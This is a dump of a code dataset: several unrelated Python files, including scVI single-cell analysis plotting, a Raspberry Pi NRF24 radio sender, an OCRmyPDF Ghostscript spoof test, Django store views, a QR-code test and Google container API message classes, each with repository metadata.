index=True,
header=True,
)
ax.set_xlabel("Mean counts")
ax.set_ylabel("Reconstuction loss")
ax.legend(scatterpoints=1)
ax = fig1.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
legend_fontweight=legend_fontweight,
ax=ax,
size=point_size,
legend_loc=legend_loc,
)
title = "{} | Genewise | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig1.suptitle(title)
fig1.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
os.makedirs(outdir, exist_ok=True)
fig1.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig1.savefig(os.path.join(outdir, "{}.png".format(title)))
fig2 = plt.figure(figsize=figsize)
ax = fig2.add_subplot(121)
ax.scatter(cell_mean, cell_loss, label="Cell", alpha=0.5, s=point_size)
ax.set_xlabel("Mean counts")
ax.set_ylabel("Reconstuction loss")
ax.legend(scatterpoints=1)
ax = fig2.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_loc=legend_loc,
legend_fontweight=legend_fontweight,
size=point_size,
)
title = "{} | Cellwise | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig2.suptitle(title)
fig2.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig2.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig2.savefig(os.path.join(outdir, "{}.png".format(title)))
if outdir:
model_name = "{} | Posterior | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
# scVI explicitly asks this path to be empty
shutil.rmtree(
os.path.join(outdir, model_name.replace(" ", "") + ".posterior"),
ignore_errors=True,
)
scvi_posterior.save_posterior(
os.path.join(outdir, model_name.replace(" ", "") + ".posterior")
)
if sct_cell_pars is None:
fig1.show()
fig2.show()
obj_to_return = (
scvi_posterior,
scvi_latent,
scvi_vae,
scvi_trainer,
fig1,
fig2,
None,
)
titles_to_return = (
"posterior",
"latent",
"vae",
"trainer",
"cellwise_plot",
"genewise_plot",
"libsize_plot",
)
return dict(zip(titles_to_return, obj_to_return))
title = "{} | Libsize | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
library_sizes = pd.DataFrame(scvi_posterior.get_stats())
sct_library_sizes = pd.read_csv(sct_cell_pars, sep="\t")
library_sizes.index = adata.obs_names
library_sizes.columns = ["scvi_libsize"]
library_sizes["scvi_loglibsize"] = np.log10(library_sizes["scvi_libsize"])
library_size_df = library_sizes.join(sct_library_sizes)
fig3 = plt.figure(figsize=(10, 5))
ax = fig3.add_subplot(121)
ax.scatter(
library_size_df["log_umi"],
library_size_df["scvi_libsize"],
alpha=0.5,
s=point_size,
)
ax.set_xlabel("log_umi")
ax.set_ylabel("scvi_libsize")
ax = fig3.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_fontweight=legend_fontweight,
legend_loc=legend_loc,
size=point_size,
)
fig3.suptitle(title)
fig3.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig3.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig3.savefig(os.path.join(outdir, "{}.png".format(title)))
fig1.show()
fig2.show()
fig3.show()
means_df = []
dropout_df = []
dispersion_df = []
for tensors in scvi_posterior.sequential(batch_size=batch_size):
sample_batch, _, _, batch_index, labels = tensors
outputs = scvi_posterior.model.inference(
sample_batch, batch_index=batch_index, y=labels
)
px_r = outputs["px_r"].detach().cpu().numpy()
px_rate = outputs["px_rate"].detach().cpu().numpy()
px_dropout = outputs["px_dropout"].detach().cpu().numpy()
dropout_df.append(px_dropout)
dispersion_df.append(px_r)
means_df.append(px_rate)
dropout_df = pd.DataFrame(np.vstack(dropout_df))
dispersion_df = pd.DataFrame(np.vstack(dispersion_df))
means_df = pd.DataFrame(np.vstack(means_df))
means_df.index = list(adata.obs_names)
means_df.columns = list(scviDataset.gene_names)
means_df = means_df.T
dropout_df.index = list(adata.obs_names)
dropout_df.columns = list(scviDataset.gene_names)
dropout_df = dropout_df.T
dispersion_df.index = list(adata.obs_names)
dispersion_df.columns = list(scviDataset.gene_names)
dispersion_df = dispersion_df.T
reconst_loss_df = pd.DataFrame(reconst_loss.detach().cpu().numpy())
reconst_loss_df.index = list(adata.obs_names)
reconst_loss_df.columns = list(scviDataset.gene_names)
reconst_loss_df = reconst_loss_df.T
if outdir:
os.makedirs(outdir, exist_ok=True)
means_df.to_csv(
os.path.join(outdir, "SCVI_means_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
dropout_df.to_csv(
os.path.join(outdir, "SCVI_dropout_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
dispersion_df.to_csv(
os.path.join(outdir, "SCVI_dispersions_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
reconst_loss_df.to_csv(
os.path.join(outdir, "SCVI_reconstloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
obj_to_return = (
scvi_posterior,
scvi_latent,
scvi_vae,
scvi_trainer,
fig1,
fig2,
fig3,
)
titles_to_return = (
"posterior",
"latent",
"vae",
"trainer",
"cellwise_plot",
"genewise_plot",
"libsize_plot",
)
sct_gene_pars_df = pd.read_csv(sct_gene_pars, sep="\t", index_col=0)
gene_cell_disp_summary_df = pd.DataFrame(
dispersion_df.median(1), columns=["gene_cell_mean_disp"]
)
merged_df = sct_gene_pars_df.join(gene_cell_disp_summary_df).dropna()
fig = plt.figure(figsize=(8, 4))
ax = fig.add_subplot(121)
ax.scatter(
merged_df["gmean"], merged_df["gene_cell_mean_disp"], alpha=0.5, label="Gene"
)
ax.legend(frameon=False)
ax.set_xlabel("Gene gmean")
ax.set_ylabel("SCVI theta")
merged_df = sct_gene_pars_df.join(sct_model_pars_fit_df)
ax = fig.add_subplot(122)
ax.scatter(merged_df["gmean"], merged_df["theta"], alpha=0.5, label="Gene")
ax.legend(frameon=False) # , loc='upper left')
ax.set_xlabel("Gene gmean")
ax.set_ylabel("SCT theta")
title = "{} | ThetaVSGmean | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig.suptitle(title)
fig.tight_layout()
title = title.replace(" ", "")
if outdir:
fig.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig.savefig(os.path.join(outdir, "{}.png".format(title)))
sct_library_sizes = pd.read_csv(sct_cell_pars, sep="\t")
mean_scvi_disp_df = pd.DataFrame(dispersion_df.mean(1), columns=["scvi_dispersion"])
sct_disp_df = pd.read_csv(
sct_cell_pars.replace("_cell_", "_model_"), sep="\t", index_col=0
)
joined_df = sct_disp_df.join(mean_scvi_disp_df)
title = "{} | Dispersion | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig4 = plt.figure(figsize=(10, 5))
ax = fig4.add_subplot(121)
ax.scatter(joined_df["theta"], joined_df["scvi_dispersion"], alpha=0.5)
ax.axline([0, 0], [1, 1], color="gray", linestyle="dashed")
ax.set_xlabel("SCT theta")
ax.set_ylabel("scVI theta")
ax = fig4.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_fontweight=legend_fontweight,
legend_loc=legend_loc,
size=point_size,
)
fig4.suptitle(title)
fig4.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig4.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig4.savefig(os.path.join(outdir, "{}.png".format(title)))
return dict(zip(titles_to_return, obj_to_return))
def RunSCVI(
counts_dir,
metadata_file,
sct_cell_pars,
outdir,
title_prefix="",
idents_col="phenoid",
reconstruction_loss="nb",
dispersion="gene-cell",
cell_offset="none",
gene_offset="none",
n_encoder=1,
hvg_genes=3000,
ldvae=False,
ldvae_bias=False,
use_cuda=True,
genes_to_exclude_file=None,
lr=1e-3,
kl_type="reverse",
**kwargs,
):
adata = sc.read_10x_mtx(counts_dir)
metadata = pd.read_csv(metadata_file, sep="\t", index_col=0)
adata.obs["named_clusters"] = metadata[idents_col]
n_epochs = np.min([round((20000 / adata.n_obs) * 400), 400])
sct_model_pars_fit = sct_cell_pars.replace("cell_pars", "model_pars_fit")
sct_gene_pars = sct_cell_pars.replace("cell_pars", "gene_attrs")
if genes_to_exclude_file:
genes_to_exclude_df = pd.read_csv(genes_to_exclude_file, sep="\t", index_col=0)
genes_to_exclude = genes_to_exclude_df.index.tolist()
all_genes = adata.var_names
genes_to_keep = list(set(all_genes).difference(genes_to_exclude))
adata = adata[:, genes_to_keep]
results = RunVAE(
adata,
reconstruction_loss,
linear=ldvae,
title_prefix=title_prefix,
n_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
hvg_genes=hvg_genes,
n_epochs=n_epochs,
lr=lr,
dispersion=dispersion,
use_cuda=use_cuda,
sct_cell_pars=sct_cell_pars,
sct_gene_pars=sct_gene_pars,
sct_model_pars_fit=sct_model_pars_fit,
outdir=outdir,
kl_type=kl_type,
**kwargs,
)
return results
|
[
"[email protected]"
] | |
f5901347ae2393fbd28a0397052a34725ea59268
|
a1333f0e6b594eda043922363734b0e9e7e65b0e
|
/Pi sender/sender.py
|
affb768b4876f887e32a097da8ba6ad0f6c1c4ab
|
[] |
no_license
|
Kartikkh/Communication-between-Rpi-and-arduino-
|
65cb1b50871b73c8fc33c7f8b9bb4c287db09d22
|
0e961b2ba408bf1171dc3ff798f255ab99d444b2
|
refs/heads/master
| 2021-01-19T14:53:37.537722 | 2017-04-13T19:01:47 | 2017-04-13T19:01:47 | 88,194,870 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,122 |
py
|
import RPi.GPIO as GPIO
from lib_nrf24 import NRF24
import time
import spidev
GPIO.setmode(GPIO.BCM)
pipes = [[0xE8 , 0xE8 , 0xF0 , 0xF0 , 0xE1] , [0xF0 ,0xF0, 0xF0, 0xF0, 0xE1]]
radio = NRF24(GPIO,spidev.SpiDev())
radio.begin(0,17)
radio.setPayloadSize(32)
radio.setChannel(0x76)
radio.setDataRate(NRF24.BR_1MBPS)
radio.setPALevel(NRF24.PA_MIN)
radio.setAutoAck(True)
radio.enableDynamicPayloads()
radio.enableAckPayload()
radio.openWritingPipe(pipes[0])
radio.openReadingPipe(1,pipes[1])
radio.printDetails()
message = "11"
while True:
start = time.time();
radio.write(message)
print("Sent message: {}".format(message))
radio.startListening()
while not radio.available(0):
time.sleep(1/100)
if time.time() - start > 2:
print("timeOut")
break
recievedMessage = []
radio.read(recievedMessage, radio.getDynamicPayloadSize())
print("Recieved : {}" .format(recievedMessage))
print("Translating string")
string = ''
print("our recieved message: {} ".format(string))
radio.stopListening()
time.sleep(2)
|
[
"khandelwal.kartik4gmail.comkhandelwal.kartik4gmail.com"
] |
khandelwal.kartik4gmail.comkhandelwal.kartik4gmail.com
|
8e4033741ac16a69170a9bfaf0ba7158c207ddc2
|
d0cf8b68b68e33900544dc056566511428692b71
|
/tests/spoof/gs_feature_elision.py
|
c2aabeb4d4d1e9b78fab46632764e38d376bfe25
|
[
"MIT"
] |
permissive
|
ryanfb/OCRmyPDF
|
3f1547c164d3b74b5e6c003bb875e50c292b36a4
|
f6a4d8f1f808a1c963c85e498a773ef0439db5ed
|
refs/heads/master
| 2021-01-21T04:25:00.603736 | 2017-08-27T20:53:36 | 2017-08-27T20:53:36 | 101,911,301 | 1 | 0 | null | 2017-08-30T17:44:15 | 2017-08-30T17:44:15 | null |
UTF-8
|
Python
| false | false | 800 |
py
|
#!/usr/bin/env python3
# © 2016 James R. Barlow: github.com/jbarlow83
import sys
import os
from subprocess import check_call
"""Replicate one type of Ghostscript feature elision warning during
PDF/A creation."""
def real_ghostscript(argv):
gs_args = ['gs'] + argv[1:]
os.execvp("gs", gs_args)
return # Not reachable
elision_warning = """GPL Ghostscript 9.20: Setting Overprint Mode to 1
not permitted in PDF/A-2, overprint mode not set"""
def main():
if '--version' in sys.argv:
print('9.20')
print('SPOOFED: ' + os.path.basename(__filename__))
sys.exit(0)
gs_args = ['gs'] + sys.argv[1:]
check_call(gs_args)
if '-sDEVICE=pdfwrite' in sys.argv[1:]:
print(elision_warning)
sys.exit(0)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
c5a2686d19b0f3755d88a674ad24192b5c02286a
|
19a3c90ce8873d8f9fa7498b64597ee6fe5b767b
|
/simplemes/uwip/apps.py
|
1db1524788524f91f0e65aafa0dfc46f57aabdcf
|
[
"MIT"
] |
permissive
|
saulshao/simplemes
|
5eff2730b95c0de1c9a51e70d9ebf1ebab59ff2c
|
fb317570666f776231c1ffd48c6114b9697e47f1
|
refs/heads/master
| 2020-07-26T13:00:46.494089 | 2020-03-12T08:26:42 | 2020-03-12T08:26:42 | 208,651,563 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 83 |
py
|
from django.apps import AppConfig
class UwipConfig(AppConfig):
name = 'uwip'
|
[
"[email protected]"
] | |
a49e1855d4a2718fa0f9f0145c2892c9d810d1b8
|
6a8d994c73983de88a60ba8278ecb3f87ab98679
|
/BONJI_store/views.py
|
736d151984c759634778278d9ef5d1c5fef4550c
|
[] |
no_license
|
dberehovets/BONJI_store
|
5d12dd8c062c086b3b6ae1f6d53ce4458ecb3621
|
33701e028ed9b94a5604b663ba446a440e8e813d
|
refs/heads/master
| 2021-04-23T21:39:51.178910 | 2020-04-21T13:02:13 | 2020-04-21T13:02:13 | 250,011,659 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,241 |
py
|
from django.views.generic import TemplateView, ListView
from django.shortcuts import redirect, render
from django.http import HttpResponseRedirect
from django.core.paginator import Paginator
from accounts.forms import SubscriberForm
from accounts.models import Subscriber
from products.models import Product
from django.contrib import messages
from django.core.mail import send_mail
from random import shuffle
class HomePage(TemplateView):
template_name = 'index.html'
def post(self, request, *args, **kwargs):
form = SubscriberForm(request.POST)
if form.is_valid():
Subscriber.objects.get_or_create(**form.cleaned_data)
messages.add_message(request, messages.SUCCESS, "You are subscribed!")
return redirect('home')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
products = list(Product.objects.all())
shuffle(products)
if len(products) >= 8:
products = products[:8]
context['products'] = products
return context
class ContactPage(TemplateView):
template_name = 'contact.html'
def post(self, request, *args, **kwargs):
# name = request.POST.get('name')
# last_name = request.POST.get('last_name')
# email = request.POST.get('email')
# subject = request.POST.get('subject') or "New message"
# message = name + " " + last_name + " wrote \n" + request.POST.get('message')
#
# send_mail(subject, message, email, ['[email protected]'])
messages.add_message(request, messages.SUCCESS, "Your email has been sent. Thank you!")
return redirect('contact')
def search(request):
if request.method == "POST":
req = request.POST.get('request')
if req == 'sale' or req == 'hot' or req == 'new':
products = Product.objects.filter(product_extra=req).order_by('-id')
else:
products = Product.objects.filter(name__contains=req).order_by('-id')
paginator = Paginator(products, 12)
return render(request, 'search_list.html', {'product_list': products, 'paginator': paginator})
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
|
[
"[email protected]"
] | |
448a496d6cf183fe73cf62e90b39b8f5e925a6f8
|
cc1d44cf04e5b2b15bb296a434aad4ae4bcfc4be
|
/python3/qr/zbarlight_test.py
|
5944e63c9ba7fb774948ce49dce2fe4de1a416f1
|
[] |
no_license
|
ericosur/ericosur-snippet
|
dda2200546b13fb9b84632d115a0f4ca5e3d5c47
|
0309eeb614612f9a35843e2f45f4080ae03eaa81
|
refs/heads/main
| 2023-08-08T04:54:05.907435 | 2023-07-25T06:04:01 | 2023-07-25T06:04:01 | 23,057,196 | 2 | 1 | null | 2022-08-31T09:55:19 | 2014-08-18T03:18:52 |
Perl
|
UTF-8
|
Python
| false | false | 864 |
py
|
#!/usr/bin/env python3
# coding: utf-8
'''
apt-get install libzbar-dev
pip install zbarlight
I do not recomment use this module to decode qrcode.
'''
import sys
from PIL import Image
import common
try:
import zbarlight
except ImportError:
print('need to install zbarligt (python) and libzbar-dev')
sys.exit(1)
def read_image(fn):
''' read image '''
im = None
with open(fn, "rb") as fin:
im = Image.open(fin)
im.load()
return im
def process():
''' process '''
arr = common.get_pngs()
for fn in arr:
print('fn:', fn)
im = read_image(fn)
codes = zbarlight.scan_codes(['qrcode'], im)
# codes in type 'byte'
for s in codes:
print(s)
print(s.decode('utf-8'))
def main():
''' main '''
process()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
fa634099a27ded13c1952c58524029bb04dfce23
|
41986b7a1b95784f0a6256ae24d5942c70ced4d7
|
/prod/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/container/v1alpha1/container_v1alpha1_messages.py
|
49c00a4745dfa8067e647185d258367759f8dcfb
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
wakabayashi-seiya/terraform_gcp
|
ed829a5a21d5d19d6663804ee5d5f7f3d23b4ec4
|
f757e56779f33c2fabd8a8eed9c51ff0b897a38f
|
refs/heads/master
| 2021-07-07T21:51:35.993317 | 2020-03-11T05:42:57 | 2020-03-11T05:42:57 | 239,411,772 | 0 | 1 | null | 2021-04-30T21:05:04 | 2020-02-10T02:32:04 |
Python
|
UTF-8
|
Python
| false | false | 175,511 |
py
|
"""Generated message classes for container version v1alpha1.
Builds and manages container-based applications, powered by the open source
Kubernetes technology.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
package = 'container'
class AcceleratorConfig(_messages.Message):
r"""AcceleratorConfig represents a Hardware Accelerator request.
Fields:
acceleratorCount: The number of the accelerator cards exposed to an
instance.
acceleratorType: The accelerator type resource name. List of supported
accelerators [here](/compute/docs/gpus)
"""
acceleratorCount = _messages.IntegerField(1)
acceleratorType = _messages.StringField(2)
class AddonsConfig(_messages.Message):
r"""Configuration for the addons that can be automatically spun up in the
cluster, enabling additional functionality.
Fields:
cloudBuildConfig: Configuration for the Cloud Build addon.
cloudRunConfig: Configuration for the Cloud Run addon. The `IstioConfig`
addon must be enabled in order to enable Cloud Run. This option can only
be enabled at cluster creation time.
configConnectorConfig: Configuration for the ConfigConnector add-on, a
Kubernetes extension to manage hosted GCP services through the
Kubernetes API
dnsCacheConfig: Configuration for NodeLocalDNS, a dns cache running on
cluster nodes
gcePersistentDiskCsiDriverConfig: Configuration for the GCP Compute
Persistent Disk CSI driver.
horizontalPodAutoscaling: Configuration for the horizontal pod autoscaling
feature, which increases or decreases the number of replica pods a
replication controller has based on the resource usage of the existing
pods.
httpLoadBalancing: Configuration for the HTTP (L7) load balancing
controller addon, which makes it easy to set up HTTP load balancers for
services in a cluster.
istioConfig: Configuration for Istio, an open platform to connect, manage,
and secure microservices.
kalmConfig: Configuration for the KALM addon, which manages the lifecycle
of k8s applications.
kubernetesDashboard: Configuration for the Kubernetes Dashboard. This
addon is deprecated, and will be disabled in 1.15. It is recommended to
use the Cloud Console to manage and monitor your Kubernetes clusters,
workloads and applications. For more information, see:
https://cloud.google.com/kubernetes-engine/docs/concepts/dashboards
networkPolicyConfig: Configuration for NetworkPolicy. This only tracks
whether the addon is enabled or not on the Master, it does not track
whether network policy is enabled for the nodes.
"""
cloudBuildConfig = _messages.MessageField('CloudBuildConfig', 1)
cloudRunConfig = _messages.MessageField('CloudRunConfig', 2)
configConnectorConfig = _messages.MessageField('ConfigConnectorConfig', 3)
dnsCacheConfig = _messages.MessageField('DnsCacheConfig', 4)
gcePersistentDiskCsiDriverConfig = _messages.MessageField('GcePersistentDiskCsiDriverConfig', 5)
horizontalPodAutoscaling = _messages.MessageField('HorizontalPodAutoscaling', 6)
httpLoadBalancing = _messages.MessageField('HttpLoadBalancing', 7)
istioConfig = _messages.MessageField('IstioConfig', 8)
kalmConfig = _messages.MessageField('KalmConfig', 9)
kubernetesDashboard = _messages.MessageField('KubernetesDashboard', 10)
networkPolicyConfig = _messages.MessageField('NetworkPolicyConfig', 11)
class AuthenticatorGroupsConfig(_messages.Message):
r"""Configuration for returning group information from authenticators.
Fields:
enabled: Whether this cluster should return group membership lookups
during authentication using a group of security groups.
securityGroup: The name of the security group-of-groups to be used. Only
relevant if enabled = true.
"""
enabled = _messages.BooleanField(1)
securityGroup = _messages.StringField(2)
class AutoUpgradeOptions(_messages.Message):
r"""AutoUpgradeOptions defines the set of options for the user to control
how the Auto Upgrades will proceed.
Fields:
autoUpgradeStartTime: [Output only] This field is set when upgrades are
about to commence with the approximate start time for the upgrades, in
[RFC3339](https://www.ietf.org/rfc/rfc3339.txt) text format.
description: [Output only] This field is set when upgrades are about to
commence with the description of the upgrade.
"""
autoUpgradeStartTime = _messages.StringField(1)
description = _messages.StringField(2)
class AutoprovisioningNodePoolDefaults(_messages.Message):
r"""AutoprovisioningNodePoolDefaults contains defaults for a node pool
created by NAP.
Fields:
management: Specifies the node management options for NAP created node-
pools.
minCpuPlatform: Minimum CPU platform to be used for NAP created node
pools. The instance may be scheduled on the specified or newer CPU
platform. Applicable values are the friendly names of CPU platforms,
such as <code>minCpuPlatform: "Intel Haswell"</code> or
<code>minCpuPlatform: "Intel Sandy Bridge"</code>. For more
information, read [how to specify min CPU
platform](https://cloud.google.com/compute/docs/instances/specify-min-
cpu-platform) To unset the min cpu platform field pass "automatic" as
field value.
oauthScopes: Scopes that are used by NAP when creating node pools. If
oauth_scopes are specified, service_account should be empty.
serviceAccount: The Google Cloud Platform Service Account to be used by
the node VMs. If service_account is specified, scopes should be empty.
upgradeSettings: Specifies the upgrade settings for NAP created node pools
"""
management = _messages.MessageField('NodeManagement', 1)
minCpuPlatform = _messages.StringField(2)
oauthScopes = _messages.StringField(3, repeated=True)
serviceAccount = _messages.StringField(4)
upgradeSettings = _messages.MessageField('UpgradeSettings', 5)
class AvailableVersion(_messages.Message):
r"""AvailableVersion is an additional Kubernetes versions offered to users
who subscribed to the release channel.
Fields:
reason: Reason for availability.
version: Kubernetes version.
"""
reason = _messages.StringField(1)
version = _messages.StringField(2)
class BigQueryDestination(_messages.Message):
r"""Parameters for using BigQuery as the destination of resource usage
export.
Fields:
datasetId: The ID of a BigQuery Dataset.
"""
datasetId = _messages.StringField(1)
class BinaryAuthorization(_messages.Message):
r"""Configuration for Binary Authorization.
Fields:
enabled: Enable Binary Authorization for this cluster. If enabled, all
container images will be validated by Google Binauthz.
"""
enabled = _messages.BooleanField(1)
class CancelOperationRequest(_messages.Message):
r"""CancelOperationRequest cancels a single operation.
Fields:
name: The name (project, location, operation id) of the operation to
cancel. Specified in the format 'projects/*/locations/*/operations/*'.
operationId: Deprecated. The server-assigned `name` of the operation. This
field has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the operation resides.
This field has been deprecated and replaced by the name field.
"""
name = _messages.StringField(1)
operationId = _messages.StringField(2)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class CidrBlock(_messages.Message):
r"""CidrBlock contains an optional name and one CIDR block.
Fields:
cidrBlock: cidr_block must be specified in CIDR notation.
displayName: display_name is an optional field for users to identify CIDR
blocks.
"""
cidrBlock = _messages.StringField(1)
displayName = _messages.StringField(2)
class ClientCertificateConfig(_messages.Message):
r"""Configuration for client certificates on the cluster.
Fields:
issueClientCertificate: Issue a client certificate.
"""
issueClientCertificate = _messages.BooleanField(1)
class CloudBuildConfig(_messages.Message):
r"""Configuration options for the Cloud Build addon.
Fields:
enabled: Whether the Cloud Build addon is enabled for this cluster.
"""
enabled = _messages.BooleanField(1)
class CloudNatStatus(_messages.Message):
r"""CloudNatStatus contains the desired state of the cloud nat functionality
on this cluster.
Fields:
enabled: Enables Cloud Nat on this cluster. On an update if
update.desired_cloud_nat_status.enabled = true, The API will check if
any Routers in the cluster's network has Cloud NAT enabled on the pod
range. a. If so, then the cluster nodes will be updated to not perform
SNAT. b. If no NAT configuration exists, a new Router with Cloud NAT
on the secondary range will be created first, and then the nodes
will be updated to no longer do SNAT.
"""
enabled = _messages.BooleanField(1)
class CloudRunConfig(_messages.Message):
r"""Configuration options for the Cloud Run feature.
Fields:
disabled: Whether Cloud Run is enabled for this cluster.
enableAlphaFeatures: Enable alpha features of Cloud Run. These features
are only available to trusted testers.
"""
disabled = _messages.BooleanField(1)
enableAlphaFeatures = _messages.BooleanField(2)
class Cluster(_messages.Message):
r"""A Google Kubernetes Engine cluster.
Enums:
NodeSchedulingStrategyValueValuesEnum: Defines behaviour of k8s scheduler.
StatusValueValuesEnum: [Output only] The current status of this cluster.
Messages:
ResourceLabelsValue: The resource labels for the cluster to use to
annotate any related GCE resources.
Fields:
addonsConfig: Configurations for the various addons available to run in
the cluster.
authenticatorGroupsConfig: Configuration controlling RBAC group membership
information.
autoscaling: Cluster-level autoscaling configuration.
binaryAuthorization: Configuration for Binary Authorization.
clusterIpv4Cidr: The IP address range of the container pods in this
cluster, in [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-
Domain_Routing) notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`.
clusterTelemetry: Telemetry integration for the cluster.
conditions: Which conditions caused the current cluster state.
costManagementConfig: Configuration for the fine-grained cost management
feature.
createTime: [Output only] The time the cluster was created, in
[RFC3339](https://www.ietf.org/rfc/rfc3339.txt) text format.
currentMasterVersion: The current software version of the master endpoint.
currentNodeCount: [Output only] The number of nodes currently in the
cluster. Deprecated. Call Kubernetes API directly to retrieve node
information.
currentNodeVersion: [Output only] Deprecated, use [NodePool.version
](/kubernetes-
engine/docs/reference/rest/v1alpha1/projects.zones.clusters.nodePool)
instead. The current version of the node software components. If they
are currently at multiple versions because they're in the process of
being upgraded, this reflects the minimum version of all nodes.
databaseEncryption: Configuration of etcd encryption.
databaseEncryptionKeyId: Resource name of a CloudKMS key to be used for
the encryption of secrets in etcd. Ex. projects/kms-
project/locations/global/keyRings/ring-1/cryptoKeys/key-1 Deprecated,
use database_encryption instead.
defaultMaxPodsConstraint: The default constraint on the maximum number of
pods that can be run simultaneously on a node in the node pool of this
cluster. Only honored if cluster created with IP Alias support.
description: An optional description of this cluster.
enableKubernetesAlpha: Kubernetes alpha features are enabled on this
cluster. This includes alpha API groups (e.g. v1alpha1) and features
that may not be production ready in the kubernetes version of the master
and nodes. The cluster has no SLA for uptime and master/node upgrades
are disabled. Alpha enabled clusters are automatically deleted thirty
days after creation.
enableTpu: Enable the ability to use Cloud TPUs in this cluster.
endpoint: [Output only] The IP address of this cluster's master endpoint.
The endpoint can be accessed from the internet at
`https://username:password@endpoint/`. See the `masterAuth` property of
this resource for username and password information.
expireTime: [Output only] The time the cluster will be automatically
deleted in [RFC3339](https://www.ietf.org/rfc/rfc3339.txt) text format.
initialClusterVersion: The initial Kubernetes version for this cluster.
Valid versions are those found in validMasterVersions returned by
getServerConfig. The version can be upgraded over time; such upgrades
are reflected in currentMasterVersion and currentNodeVersion. Users may
specify either explicit versions offered by Kubernetes Engine or version
aliases, which have the following behavior: - "latest": picks the
highest valid Kubernetes version - "1.X": picks the highest valid
patch+gke.N patch in the 1.X version - "1.X.Y": picks the highest valid
gke.N patch in the 1.X.Y version - "1.X.Y-gke.N": picks an explicit
Kubernetes version - "","-": picks the default Kubernetes version
initialNodeCount: The number of nodes to create in this cluster. You must
ensure that your Compute Engine <a href="/compute/docs/resource-
quotas">resource quota</a> is sufficient for this number of instances.
You must also have available firewall and routes quota. For requests,
this field should only be used in lieu of a "node_pool" object, since
this configuration (along with the "node_config") will be used to create
a "NodePool" object with an auto-generated name. Do not use this and a
node_pool at the same time. This field is deprecated, use
node_pool.initial_node_count instead.
instanceGroupUrls: Deprecated. Use node_pools.instance_group_urls.
ipAllocationPolicy: Configuration for cluster IP allocation.
labelFingerprint: The fingerprint of the set of labels for this cluster.
legacyAbac: Configuration for the legacy ABAC authorization mode.
location: [Output only] The name of the Google Compute Engine
[zone](/compute/docs/regions-zones/regions-zones#available) or
[region](/compute/docs/regions-zones/regions-zones#available) in which
the cluster resides.
locations: The list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the cluster's nodes
should be located.
loggingService: The logging service the cluster should use to write logs.
Currently available options: * `logging.googleapis.com` - the Google
Cloud Logging service. * `none` - no logs will be exported from the
cluster. * if left as an empty string,`logging.googleapis.com` will be
used.
maintenancePolicy: Configure the maintenance policy for this cluster.
masterAuth: The authentication information for accessing the master
endpoint. If unspecified, the defaults are used: For clusters before
v1.12, if master_auth is unspecified, `username` will be set to "admin",
a random password will be generated, and a client certificate will be
issued.
masterAuthorizedNetworksConfig: The configuration options for master
authorized networks feature.
masterIpv4CidrBlock: The IP prefix in CIDR notation to use for the hosted
master network. This prefix will be used for assigning private IP
